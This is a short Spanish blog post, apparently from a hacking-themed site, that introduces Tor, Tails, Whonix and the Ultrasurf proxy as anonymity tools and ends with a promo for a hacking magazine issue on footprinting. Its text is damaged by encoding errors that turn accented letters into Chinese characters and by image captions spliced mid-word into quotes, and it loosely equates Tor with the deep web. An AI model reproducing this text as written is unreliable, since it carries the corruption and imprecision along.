“Es un proyecto cuyo objetivo principal es el desarrollo de una red de comunicaci贸Resultado de imagen para la red tornes distribuida de baja latencia y superpuesta sobre internet, en la que el encaminamiento de los mensajes intercambiados entre los usuarios no revela su identidad, es decir, su direcci贸n IP (anonimato a nivel de red) y que, adem谩s, mantiene la integridad y el secreto de la informaci贸n que viaja por ella. Por este motivo se dice que esta tecnolog铆a pertenece a la llamada darknet o red oscura tambi茅n conocida con el nombre de deep web o web profunda.” Wikipedia

Existe una gran cantidad de software que nos puede ayudar a mantener un nivel de “anonimato” seguro, pues aparte de implementar VPN o usar Tor, tambi茅n tenemos sistemas operativos pensados en mantener el anonimato como por ejemplo聽Tails o Whonix聽un sistema operativo 100% pensado para mantener el anonimato de sus usuarios.

Aparte de los sistemas operativos tenemos programas, que no requieren de gran conocimiento para poder ser usado, un ejemplo es Ultrasuft聽un proxy gratuito.

“Ultrasurf es un productResultado de imagen para ultrasurfo de UltraReach Corporaci贸n de Internet. Originalmente creado para ayudar a los usuarios de Internet en China se encuentran la seguridad y la libertad en l铆nea, Ultrasurf se ha convertido en uno de los m谩s populares anti-censura del mundo, el software pro-privacidad, con millones de personas que lo usan para eludir la censura en Internet y proteger su privacidad en l铆nea.” – UltraSurf

ByMoritz

Revista Hacking Publico-Segunda Edici贸n

Bienvenidos a nuestra segunda edici贸n de la Revista Hacking Publico – Tema principal FOOTPRINTING.

Disfruta nuestra vista online o descargala y coleccionala

Read More